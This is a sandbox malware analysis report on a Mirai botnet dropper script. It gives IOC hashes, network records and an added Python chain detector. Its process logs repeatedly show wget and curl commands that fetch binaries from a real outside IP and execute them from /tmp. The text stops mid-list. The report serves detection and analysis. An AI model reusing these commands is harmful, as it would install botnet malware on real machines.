Malware Analysis Report

2024-10-10 11:00

Sample ID 240722-aja8yasapc
Target no.sh
SHA256 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae
Tags: mirai, botnet, antivm
Score: 10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

Score: 10/10

SHA256: 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae

Threat Level: Known bad

The file no.sh was found to be: Known bad.

Malicious Activity Summary

Tags: mirai, botnet, antivm

Mirai
Executes dropped EXE
Checks CPU configuration
Reads runtime system information
Writes file to tmp directory

Read together, the behavioral runs show no.sh to be a multi-architecture Mirai dropper. For each of thirteen builds (tsuki.x86, .mips, .mpsl, .arm, .arm5, .arm6, .arm7, .ppc, .m68k, .spc, .i686, .sh4, .arc) it fetches http://176.123.2.219/bins/tsuki.<arch> with wget and then with curl -O, runs cat tsuki.<arch> while /tmp/no.sh itself opens /tmp/tsuki for writing (the signature of a shell redirect, cat tsuki.<arch> > tsuki), marks everything in /tmp executable (the chmod argument lists contain sandbox-owned systemd-private-* and other names the script never created, consistent with chmod +x *), and executes ./tsuki payload before moving to the next build. Two points for triage: the "Checks CPU configuration" (antivm) and "Reads runtime system information" hits are attributed to /usr/bin/curl reading /proc/cpuinfo, /proc/self/auxv and /proc/sys/crypto/fips_enabled, not to no.sh or tsuki, so they should not be read as evasion by the sample; and the static analysis recorded no signatures, so every detection on this page is behavioral.

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-07-22 00:14

Signatures

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-07-22 00:14

Reported

2024-07-22 00:16

Platform

debian9-mipsel-20240418-en

Max time kernel

69s

Max time network

71s

Command Line

[/tmp/no.sh]

Signatures

Mirai

botnet mirai

Executes dropped EXE

Description Indicator Process Target Count
N/A /tmp/tsuki /tmp/tsuki N/A 13 (one execution per architecture iteration)

Reads runtime system information

Description Indicator Process Target Count
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A 13

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/tsuki.spc /usr/bin/curl N/A
File opened for modification /tmp/tsuki.i686 /usr/bin/curl N/A
File opened for modification /tmp/tsuki.x86 /usr/bin/curl N/A
File opened for modification /tmp/tsuki /tmp/no.sh N/A
File opened for modification /tmp/tsuki.mpsl /usr/bin/wget N/A
File opened for modification /tmp/tsuki.arm5 /usr/bin/curl N/A
File opened for modification /tmp/tsuki.arm7 /usr/bin/wget N/A
File opened for modification /tmp/tsuki.arc /usr/bin/curl N/A
File opened for modification /tmp/tsuki.arm6 /usr/bin/curl N/A
File opened for modification /tmp/tsuki.ppc /usr/bin/wget N/A
File opened for modification /tmp/tsuki.ppc /usr/bin/curl N/A
File opened for modification /tmp/tsuki.m68k /usr/bin/wget N/A
File opened for modification /tmp/tsuki.x86 /usr/bin/wget N/A
File opened for modification /tmp/tsuki.mips /usr/bin/wget N/A
File opened for modification /tmp/tsuki.arm /usr/bin/wget N/A
File opened for modification /tmp/tsuki.arm /usr/bin/curl N/A
File opened for modification /tmp/tsuki.m68k /usr/bin/curl N/A
File opened for modification /tmp/tsuki.sh4 /usr/bin/wget N/A
File opened for modification /tmp/tsuki.mips /usr/bin/curl N/A
File opened for modification /tmp/tsuki.mpsl /usr/bin/curl N/A
File opened for modification /tmp/tsuki.arm7 /usr/bin/curl N/A
File opened for modification /tmp/tsuki.sh4 /usr/bin/curl N/A

Processes

/tmp/no.sh

[/tmp/no.sh]

/usr/bin/wget

[wget http://176.123.2.219/bins/tsuki.x86]

/usr/bin/curl

[curl -O http://176.123.2.219/bins/tsuki.x86]

/bin/cat

[cat tsuki.x86]

/bin/chmod

[chmod +x no.sh systemd-private-0ed40a9e127f41699077075a5bd2978f-systemd-timedated.service-DCyFuE tsuki tsuki.x86]

/tmp/tsuki

[./tsuki payload]

/usr/bin/wget

[wget http://176.123.2.219/bins/tsuki.mips]

/usr/bin/curl

[curl -O http://176.123.2.219/bins/tsuki.mips]

/bin/cat

[cat tsuki.mips]

/bin/chmod

[chmod +x no.sh systemd-private-0ed40a9e127f41699077075a5bd2978f-systemd-timedated.service-DCyFuE tsuki tsuki.mips tsuki.x86]

/tmp/tsuki

[./tsuki payload]

/usr/bin/wget

[wget http://176.123.2.219/bins/tsuki.mpsl]

/usr/bin/curl

[curl -O http://176.123.2.219/bins/tsuki.mpsl]

/bin/cat

[cat tsuki.mpsl]

/bin/chmod

[chmod +x no.sh systemd-private-0ed40a9e127f41699077075a5bd2978f-systemd-timedated.service-DCyFuE tsuki tsuki.mips tsuki.mpsl tsuki.x86]

/tmp/tsuki

[./tsuki payload]

/usr/bin/wget

[wget http://176.123.2.219/bins/tsuki.arm]

/usr/bin/curl

[curl -O http://176.123.2.219/bins/tsuki.arm]

/bin/cat

[cat tsuki.arm]

/bin/chmod

[chmod +x no.sh systemd-private-0ed40a9e127f41699077075a5bd2978f-systemd-timedated.service-DCyFuE tsuki tsuki.arm tsuki.mips tsuki.mpsl tsuki.x86]

/tmp/tsuki

[./tsuki payload]

/usr/bin/wget

[wget http://176.123.2.219/bins/tsuki.arm5]

/usr/bin/curl

[curl -O http://176.123.2.219/bins/tsuki.arm5]

/bin/cat

[cat tsuki.arm5]

/bin/chmod

[chmod +x no.sh tsuki tsuki.arm tsuki.arm5 tsuki.mips tsuki.mpsl tsuki.x86]

/tmp/tsuki

[./tsuki payload]

/usr/bin/wget

[wget http://176.123.2.219/bins/tsuki.arm6]

/usr/bin/curl

[curl -O http://176.123.2.219/bins/tsuki.arm6]

/bin/cat

[cat tsuki.arm6]

/bin/chmod

[chmod +x no.sh tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.mips tsuki.mpsl tsuki.x86]

/tmp/tsuki

[./tsuki payload]

/usr/bin/wget

[wget http://176.123.2.219/bins/tsuki.arm7]

/usr/bin/curl

[curl -O http://176.123.2.219/bins/tsuki.arm7]

/bin/cat

[cat tsuki.arm7]

/bin/chmod

[chmod +x no.sh tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.mips tsuki.mpsl tsuki.x86]

/tmp/tsuki

[./tsuki payload]

/usr/bin/wget

[wget http://176.123.2.219/bins/tsuki.ppc]

/usr/bin/curl

[curl -O http://176.123.2.219/bins/tsuki.ppc]

/bin/cat

[cat tsuki.ppc]

/bin/chmod

[chmod +x no.sh tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.mips tsuki.mpsl tsuki.ppc tsuki.x86]

/tmp/tsuki

[./tsuki payload]

/usr/bin/wget

[wget http://176.123.2.219/bins/tsuki.m68k]

/usr/bin/curl

[curl -O http://176.123.2.219/bins/tsuki.m68k]

/bin/cat

[cat tsuki.m68k]

/bin/chmod

[chmod +x no.sh tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.m68k tsuki.mips tsuki.mpsl tsuki.ppc tsuki.x86]

/tmp/tsuki

[./tsuki payload]

/usr/bin/wget

[wget http://176.123.2.219/bins/tsuki.spc]

/usr/bin/curl

[curl -O http://176.123.2.219/bins/tsuki.spc]

/bin/cat

[cat tsuki.spc]

/bin/chmod

[chmod +x no.sh tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.m68k tsuki.mips tsuki.mpsl tsuki.ppc tsuki.spc tsuki.x86]

/tmp/tsuki

[./tsuki payload]

/usr/bin/wget

[wget http://176.123.2.219/bins/tsuki.i686]

/usr/bin/curl

[curl -O http://176.123.2.219/bins/tsuki.i686]

/bin/cat

[cat tsuki.i686]

/bin/chmod

[chmod +x no.sh tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.i686 tsuki.m68k tsuki.mips tsuki.mpsl tsuki.ppc tsuki.spc tsuki.x86]

/tmp/tsuki

[./tsuki payload]

/usr/bin/wget

[wget http://176.123.2.219/bins/tsuki.sh4]

/usr/bin/curl

[curl -O http://176.123.2.219/bins/tsuki.sh4]

/bin/cat

[cat tsuki.sh4]

/bin/chmod

[chmod +x no.sh tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.i686 tsuki.m68k tsuki.mips tsuki.mpsl tsuki.ppc tsuki.sh4 tsuki.spc tsuki.x86]

/tmp/tsuki

[./tsuki payload]

/usr/bin/wget

[wget http://176.123.2.219/bins/tsuki.arc]

/usr/bin/curl

[curl -O http://176.123.2.219/bins/tsuki.arc]

/bin/cat

[cat tsuki.arc]

/bin/chmod

[chmod +x no.sh tsuki tsuki.arc tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.i686 tsuki.m68k tsuki.mips tsuki.mpsl tsuki.ppc tsuki.sh4 tsuki.spc tsuki.x86]

/tmp/tsuki

[./tsuki payload]
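The process list above is the whole dropper loop: fetch from a literal-IP URL, chmod +x, execute from /tmp, repeat. The following detector walks process events in order and raises an alert for each completed chain, and separately flags a chmod whose argument list contains names the tree never created (how a shell glob such as chmod +x * surfaces in argv). This is an added example and not part of the sandbox report; the event list is constructed from the report's own argv strings for three of the thirteen iterations, while pids, ppids and the working directory are assumptions, since the report does not give them.

```python
"""Detect the fetch -> chmod +x -> execute-from-/tmp chain recorded above.

Added example, not part of the sandbox report.  EVENTS is constructed from the
report's argv strings; pid, ppid and cwd values are assumed (the report omits them).
"""
import re
from collections import defaultdict

FETCHERS = {"wget", "curl"}
# Download URL whose host is a literal IPv4 address, as every URL in this report is.
IP_URL = re.compile(r"^https?://(\d{1,3}(?:\.\d{1,3}){3})(?::\d+)?/(.+)$")

# Constructed process events: (pid, ppid, cwd, cmdline), three of the thirteen
# iterations in the report; the remaining ten follow the same pattern.
EVENTS = [
    (100, 1,   "/tmp", "/tmp/no.sh"),
    (101, 100, "/tmp", "wget http://176.123.2.219/bins/tsuki.x86"),
    (102, 100, "/tmp", "curl -O http://176.123.2.219/bins/tsuki.x86"),
    (103, 100, "/tmp", "cat tsuki.x86"),
    (104, 100, "/tmp", "chmod +x no.sh systemd-private-0ed40a9e127f41699077075a5bd2978f-systemd-timedated.service-DCyFuE tsuki tsuki.x86"),
    (105, 100, "/tmp", "./tsuki payload"),
    (106, 100, "/tmp", "wget http://176.123.2.219/bins/tsuki.mips"),
    (107, 100, "/tmp", "curl -O http://176.123.2.219/bins/tsuki.mips"),
    (108, 100, "/tmp", "cat tsuki.mips"),
    (109, 100, "/tmp", "chmod +x no.sh systemd-private-0ed40a9e127f41699077075a5bd2978f-systemd-timedated.service-DCyFuE tsuki tsuki.mips tsuki.x86"),
    (110, 100, "/tmp", "./tsuki payload"),
    (111, 100, "/tmp", "wget http://176.123.2.219/bins/tsuki.arm"),
    (112, 100, "/tmp", "curl -O http://176.123.2.219/bins/tsuki.arm"),
    (113, 100, "/tmp", "cat tsuki.arm"),
    (114, 100, "/tmp", "chmod +x no.sh systemd-private-0ed40a9e127f41699077075a5bd2978f-systemd-timedated.service-DCyFuE tsuki tsuki.arm tsuki.mips tsuki.x86"),
    (115, 100, "/tmp", "./tsuki payload"),
]


def basename(path):
    return path.rsplit("/", 1)[-1]


def analyse(events):
    """Walk events in order; return (alerts, summary).

    An alert is raised whenever a process executes a relative path from /tmp
    after its parent has (a) fetched a file from a literal-IP URL and
    (b) run chmod +x on the executed name.
    """
    script_of = {}                   # pid -> basename of the interpreter's script
    fetched = defaultdict(dict)      # ppid -> {basename: url}
    chmodded = defaultdict(set)      # ppid -> names given +x so far
    unexplained = defaultdict(set)   # ppid -> chmod targets the tree never fetched or ran
    alerts = []

    for pid, ppid, cwd, cmdline in events:
        argv = cmdline.split()       # the report shows no quoting, so whitespace split is exact
        name = basename(argv[0])
        if name.endswith(".sh"):
            script_of[pid] = name
        elif name in FETCHERS:
            for arg in argv[1:]:
                m = IP_URL.match(arg)
                if m:
                    fetched[ppid][basename(m.group(2))] = arg
        elif name == "chmod" and "+x" in argv:
            targets = set(argv[argv.index("+x") + 1:])
            chmodded[ppid] |= targets
            known = set(fetched[ppid]) | {script_of.get(ppid, "")}
            unexplained[ppid] |= targets - known
        elif argv[0].startswith("./") and cwd.startswith("/tmp"):
            target = argv[0][2:]
            unexplained[ppid].discard(target)   # executed, so it belongs to the chain
            if target in chmodded[ppid] and fetched[ppid]:
                alerts.append({
                    "parent": ppid,
                    "executed": f"{cwd}/{target}",
                    "args": argv[1:],
                    "fetched_from": sorted(set(fetched[ppid].values())),
                })

    summary = {
        "iterations": len(alerts),
        "download_hosts": sorted({IP_URL.match(u).group(1)
                                  for d in fetched.values() for u in d.values()}),
        # Names the dropper never created but still chmod'ed: a shell glob in argv.
        "glob_chmod": {p: sorted(u) for p, u in unexplained.items() if u},
    }
    return alerts, summary


if __name__ == "__main__":
    found, stats = analyse(EVENTS)
    for a in found:
        print(f"chain: parent {a['parent']} ran {a['executed']} {a['args']} after fetching {a['fetched_from']}")
    print(stats)
```

The glob indicator is the one worth keeping in a production rule: a legitimate install script names the files it created, whereas chmod +x * drags in whatever else lives in /tmp (here the sandbox's systemd-private-* directory), which is exactly what the report's chmod lines show.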

Network

Country Destination Domain Proto Count
MD 176.123.2.219:80 176.123.2.219 tcp 26

The 26 connections match the process list exactly: 13 builds, each fetched once by wget and once by curl -O. No other destination was contacted in this run.

Files

(/tmp/tsuki appears six times below with different hashes: the path is overwritten on every iteration, so each entry is a snapshot of different content at a different point in the run. /tmp/tsuki.x86 is the only per-architecture download whose hashes the report records.)

/tmp/tsuki.x86

MD5 f60ada8b79c2232773b9c08868c1c5fb
SHA1 8752a84f5cc638e0a87ffa7bb28d4a9661fcbefa
SHA256 2d1fd93daf8cadaf775a8cd4e21f8b7b1759442bd260eb6dde3aee319adae117
SHA512 71fe4806ac06da9a8d704bbabcc7dc7d0d7e087b420ea81923c888f0f8836b455e790899504729611e883e597a31c5eb7298c4cd5f442117cc799f98102eb9e8

/tmp/tsuki

MD5 6cf78b3572c325d809ad4677c2ebd6a2
SHA1 be2f27c2b001f981344e52333568cb0dc7ffe7ad
SHA256 c6603610d98124953b9b6e4355611cb0588507a8a003aff36771937b43e2acd0
SHA512 bcb15e53b55134cefcf8de2c0fd28fee6154dc63bc053007f581cec3bc024052b663eed5ce2f3eea3c3b7749d2f4e7a5b0ed013c489bc1c28755d82bebea8a24

/tmp/tsuki

MD5 2cf4b7e9a6fa11dbff627fc7aeee3f97
SHA1 0cbc6d981a4d7ce2650ebe9aba5ec89a8377fefb
SHA256 eb2c0d50d32ebf8d18e82dd780c2432f4010e5dd8f0cc84c04a10f03f8399a6d
SHA512 18272662786616a679ed85164c4fa7fe2a865f8c4eedde57403f8fd197c34b356ff3a62155ea9069f2e1f172c4545c29db4c3144c9932f90bdea5a4f14141f57

/tmp/tsuki

MD5 3cd8418ac8f414def6727fe141d328b9
SHA1 dc61b74e9e08ff3208ee96a6c94f8247e6196b99
SHA256 cbe3077abc42c9e725ee561b8e369c9e5b3819d762d8fa9889b27c1e10dfb8b3
SHA512 98d72d05b5b65fac98ed3b448ebf73786040da5aebbe56c060781f78638e75e62ad8801618874c4c17c13cd59bab93f58a31b565a350ac118257d2a0a21409b9

/tmp/tsuki

MD5 eeed291445ee3e6bac53540dfd6cd91c
SHA1 afc1907c25cf19a1ecf3e83fcd1f7cc72d085f41
SHA256 43953e23b49d467cd6b2e40603c2465769cd1620706ef52fecc71777f9964f78
SHA512 ee610ac06ef742dbf5b616c72b30a32b64a2873272cbf297367de20563bf405b183842fb5e2012f29d5ee11e6ee10e97a90ec915ffb659f22439f7c1ca21d283

/tmp/tsuki

MD5 adf30c84e4d1a741bb51593fa750d624
SHA1 ca52225d16c403e9e6ab662e8dab63496281945d
SHA256 96de1caeeddeba6420add3efbba3e360a13b9956a32be4ee1d4464129154e806
SHA512 9ce9154a018aa53c49403c1919cb223f066821a22a9692cbb1defd185098842d8ded4f0a3f17cd6017367ea1357c41295c9f199d1148998f7283f511244db846

Analysis: behavioral1

Detonation Overview

Submitted

2024-07-22 00:14

Reported

2024-07-22 00:16

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

17s

Max time network

131s

Command Line

[/tmp/no.sh]

Signatures

Mirai

botnet mirai

Executes dropped EXE

Description Indicator Process Target Count
N/A /tmp/tsuki /tmp/tsuki N/A 13 (one execution per architecture iteration)

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/tsuki.mpsl /usr/bin/wget N/A
File opened for modification /tmp/tsuki.arm5 /usr/bin/curl N/A
File opened for modification /tmp/tsuki.arm6 /usr/bin/curl N/A
File opened for modification /tmp/tsuki.i686 /usr/bin/curl N/A
File opened for modification /tmp/tsuki.x86 /usr/bin/wget N/A
File opened for modification /tmp/tsuki.mpsl /usr/bin/curl N/A
File opened for modification /tmp/tsuki.m68k /usr/bin/curl N/A
File opened for modification /tmp/tsuki.spc /usr/bin/curl N/A
File opened for modification /tmp/tsuki.sh4 /usr/bin/wget N/A
File opened for modification /tmp/tsuki.arm7 /usr/bin/curl N/A
File opened for modification /tmp/tsuki.x86 /usr/bin/curl N/A
File opened for modification /tmp/tsuki /tmp/no.sh N/A
File opened for modification /tmp/tsuki.mips /usr/bin/curl N/A
File opened for modification /tmp/tsuki.arm /usr/bin/wget N/A
File opened for modification /tmp/tsuki.arm /usr/bin/curl N/A
File opened for modification /tmp/tsuki.arm7 /usr/bin/wget N/A
File opened for modification /tmp/tsuki.mips /usr/bin/wget N/A
File opened for modification /tmp/tsuki.ppc /usr/bin/wget N/A
File opened for modification /tmp/tsuki.ppc /usr/bin/curl N/A
File opened for modification /tmp/tsuki.m68k /usr/bin/wget N/A
File opened for modification /tmp/tsuki.sh4 /usr/bin/curl N/A
File opened for modification /tmp/tsuki.arc /usr/bin/curl N/A

Processes

/tmp/no.sh

[/tmp/no.sh]

/usr/bin/wget

[wget http://176.123.2.219/bins/tsuki.x86]

/usr/bin/curl

[curl -O http://176.123.2.219/bins/tsuki.x86]

/bin/cat

[cat tsuki.x86]

/bin/chmod

[chmod +x config-err-KaZKo5 netplan_shzgbutu no.sh snap-private-tmp ssh-DJAIfF5vDuSn systemd-private-405cfb5ad6264ab195f9c96db16d9d87-bolt.service-TbhmLP systemd-private-405cfb5ad6264ab195f9c96db16d9d87-colord.service-Zm2MHU systemd-private-405cfb5ad6264ab195f9c96db16d9d87-ModemManager.service-byjNAE systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-resolved.service-9DiRy3 systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-timedated.service-zrymRL tsuki tsuki.x86]

/tmp/tsuki

[./tsuki payload]

/usr/bin/wget

[wget http://176.123.2.219/bins/tsuki.mips]

/usr/bin/curl

[curl -O http://176.123.2.219/bins/tsuki.mips]

/bin/cat

[cat tsuki.mips]

/bin/chmod

[chmod +x config-err-KaZKo5 netplan_shzgbutu no.sh snap-private-tmp ssh-DJAIfF5vDuSn systemd-private-405cfb5ad6264ab195f9c96db16d9d87-bolt.service-TbhmLP systemd-private-405cfb5ad6264ab195f9c96db16d9d87-colord.service-Zm2MHU systemd-private-405cfb5ad6264ab195f9c96db16d9d87-ModemManager.service-byjNAE systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-resolved.service-9DiRy3 systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-timedated.service-zrymRL tsuki tsuki.mips tsuki.x86]

/tmp/tsuki

[./tsuki payload]

/usr/bin/wget

[wget http://176.123.2.219/bins/tsuki.mpsl]

/usr/bin/curl

[curl -O http://176.123.2.219/bins/tsuki.mpsl]

/bin/cat

[cat tsuki.mpsl]

/bin/chmod

[chmod +x config-err-KaZKo5 netplan_shzgbutu no.sh snap-private-tmp ssh-DJAIfF5vDuSn systemd-private-405cfb5ad6264ab195f9c96db16d9d87-bolt.service-TbhmLP systemd-private-405cfb5ad6264ab195f9c96db16d9d87-colord.service-Zm2MHU systemd-private-405cfb5ad6264ab195f9c96db16d9d87-ModemManager.service-byjNAE systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-resolved.service-9DiRy3 systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-timedated.service-zrymRL tsuki tsuki.mips tsuki.mpsl tsuki.x86]

/tmp/tsuki

[./tsuki payload]

/usr/bin/wget

[wget http://176.123.2.219/bins/tsuki.arm]

/usr/bin/curl

[curl -O http://176.123.2.219/bins/tsuki.arm]

/bin/cat

[cat tsuki.arm]

/bin/chmod

[chmod +x config-err-KaZKo5 netplan_shzgbutu no.sh snap-private-tmp ssh-DJAIfF5vDuSn systemd-private-405cfb5ad6264ab195f9c96db16d9d87-bolt.service-TbhmLP systemd-private-405cfb5ad6264ab195f9c96db16d9d87-colord.service-Zm2MHU systemd-private-405cfb5ad6264ab195f9c96db16d9d87-ModemManager.service-byjNAE systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-resolved.service-9DiRy3 systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-timedated.service-zrymRL tsuki tsuki.arm tsuki.mips tsuki.mpsl tsuki.x86]

/tmp/tsuki

[./tsuki payload]

/usr/bin/wget

[wget http://176.123.2.219/bins/tsuki.arm5]

/usr/bin/curl

[curl -O http://176.123.2.219/bins/tsuki.arm5]

/bin/cat

[cat tsuki.arm5]

/bin/chmod

[chmod +x config-err-KaZKo5 netplan_shzgbutu no.sh snap-private-tmp ssh-DJAIfF5vDuSn systemd-private-405cfb5ad6264ab195f9c96db16d9d87-bolt.service-TbhmLP systemd-private-405cfb5ad6264ab195f9c96db16d9d87-colord.service-Zm2MHU systemd-private-405cfb5ad6264ab195f9c96db16d9d87-ModemManager.service-byjNAE systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-resolved.service-9DiRy3 systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-timedated.service-zrymRL tsuki tsuki.arm tsuki.arm5 tsuki.mips tsuki.mpsl tsuki.x86]

/tmp/tsuki

[./tsuki payload]

/usr/bin/wget

[wget http://176.123.2.219/bins/tsuki.arm6]

/usr/bin/curl

[curl -O http://176.123.2.219/bins/tsuki.arm6]

/bin/cat

[cat tsuki.arm6]

/bin/chmod

[chmod +x config-err-KaZKo5 netplan_shzgbutu no.sh snap-private-tmp ssh-DJAIfF5vDuSn systemd-private-405cfb5ad6264ab195f9c96db16d9d87-bolt.service-TbhmLP systemd-private-405cfb5ad6264ab195f9c96db16d9d87-colord.service-Zm2MHU systemd-private-405cfb5ad6264ab195f9c96db16d9d87-ModemManager.service-byjNAE systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-resolved.service-9DiRy3 systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-timedated.service-zrymRL tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.mips tsuki.mpsl tsuki.x86]

/tmp/tsuki

[./tsuki payload]

/usr/bin/wget

[wget http://176.123.2.219/bins/tsuki.arm7]

/usr/bin/curl

[curl -O http://176.123.2.219/bins/tsuki.arm7]

/bin/cat

[cat tsuki.arm7]

/bin/chmod

[chmod +x config-err-KaZKo5 netplan_shzgbutu no.sh snap-private-tmp ssh-DJAIfF5vDuSn systemd-private-405cfb5ad6264ab195f9c96db16d9d87-bolt.service-TbhmLP systemd-private-405cfb5ad6264ab195f9c96db16d9d87-colord.service-Zm2MHU systemd-private-405cfb5ad6264ab195f9c96db16d9d87-ModemManager.service-byjNAE systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-resolved.service-9DiRy3 systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-timedated.service-zrymRL tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.mips tsuki.mpsl tsuki.x86]

/tmp/tsuki

[./tsuki payload]

/usr/bin/wget

[wget http://176.123.2.219/bins/tsuki.ppc]

/usr/bin/curl

[curl -O http://176.123.2.219/bins/tsuki.ppc]

/bin/cat

[cat tsuki.ppc]

/bin/chmod

[chmod +x config-err-KaZKo5 netplan_shzgbutu no.sh snap-private-tmp ssh-DJAIfF5vDuSn systemd-private-405cfb5ad6264ab195f9c96db16d9d87-bolt.service-TbhmLP systemd-private-405cfb5ad6264ab195f9c96db16d9d87-colord.service-Zm2MHU systemd-private-405cfb5ad6264ab195f9c96db16d9d87-ModemManager.service-byjNAE systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-resolved.service-9DiRy3 systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-timedated.service-zrymRL tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.mips tsuki.mpsl tsuki.ppc tsuki.x86]

/tmp/tsuki

[./tsuki payload]

/usr/bin/wget

[wget http://176.123.2.219/bins/tsuki.m68k]

/usr/bin/curl

[curl -O http://176.123.2.219/bins/tsuki.m68k]

/bin/cat

[cat tsuki.m68k]

/bin/chmod

[chmod +x config-err-KaZKo5 netplan_shzgbutu no.sh snap-private-tmp ssh-DJAIfF5vDuSn systemd-private-405cfb5ad6264ab195f9c96db16d9d87-bolt.service-TbhmLP systemd-private-405cfb5ad6264ab195f9c96db16d9d87-colord.service-Zm2MHU systemd-private-405cfb5ad6264ab195f9c96db16d9d87-ModemManager.service-byjNAE systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-resolved.service-9DiRy3 systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-timedated.service-zrymRL tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.m68k tsuki.mips tsuki.mpsl tsuki.ppc tsuki.x86]

/tmp/tsuki

[./tsuki payload]

/usr/bin/wget

[wget http://176.123.2.219/bins/tsuki.spc]

/usr/bin/curl

[curl -O http://176.123.2.219/bins/tsuki.spc]

/bin/cat

[cat tsuki.spc]

/bin/chmod

[chmod +x config-err-KaZKo5 netplan_shzgbutu no.sh snap-private-tmp ssh-DJAIfF5vDuSn systemd-private-405cfb5ad6264ab195f9c96db16d9d87-bolt.service-TbhmLP systemd-private-405cfb5ad6264ab195f9c96db16d9d87-colord.service-Zm2MHU systemd-private-405cfb5ad6264ab195f9c96db16d9d87-ModemManager.service-byjNAE systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-resolved.service-9DiRy3 systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-timedated.service-zrymRL tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.m68k tsuki.mips tsuki.mpsl tsuki.ppc tsuki.spc tsuki.x86]

/tmp/tsuki

[./tsuki payload]

/usr/bin/wget

[wget http://176.123.2.219/bins/tsuki.i686]

/usr/bin/curl

[curl -O http://176.123.2.219/bins/tsuki.i686]

/bin/cat

[cat tsuki.i686]

/bin/chmod

[chmod +x config-err-KaZKo5 netplan_shzgbutu no.sh snap-private-tmp ssh-DJAIfF5vDuSn systemd-private-405cfb5ad6264ab195f9c96db16d9d87-bolt.service-TbhmLP systemd-private-405cfb5ad6264ab195f9c96db16d9d87-colord.service-Zm2MHU systemd-private-405cfb5ad6264ab195f9c96db16d9d87-ModemManager.service-byjNAE systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-resolved.service-9DiRy3 systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-timedated.service-zrymRL tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.i686 tsuki.m68k tsuki.mips tsuki.mpsl tsuki.ppc tsuki.spc tsuki.x86]

/tmp/tsuki

[./tsuki payload]

/usr/bin/wget

[wget http://176.123.2.219/bins/tsuki.sh4]

/usr/bin/curl

[curl -O http://176.123.2.219/bins/tsuki.sh4]

/bin/cat

[cat tsuki.sh4]

/bin/chmod

[chmod +x config-err-KaZKo5 netplan_shzgbutu no.sh snap-private-tmp ssh-DJAIfF5vDuSn systemd-private-405cfb5ad6264ab195f9c96db16d9d87-bolt.service-TbhmLP systemd-private-405cfb5ad6264ab195f9c96db16d9d87-colord.service-Zm2MHU systemd-private-405cfb5ad6264ab195f9c96db16d9d87-ModemManager.service-byjNAE systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-resolved.service-9DiRy3 systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-timedated.service-zrymRL tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.i686 tsuki.m68k tsuki.mips tsuki.mpsl tsuki.ppc tsuki.sh4 tsuki.spc tsuki.x86]

/tmp/tsuki

[./tsuki payload]

/usr/bin/wget

[wget http://176.123.2.219/bins/tsuki.arc]

/usr/bin/curl

[curl -O http://176.123.2.219/bins/tsuki.arc]

/bin/cat

[cat tsuki.arc]

/bin/chmod

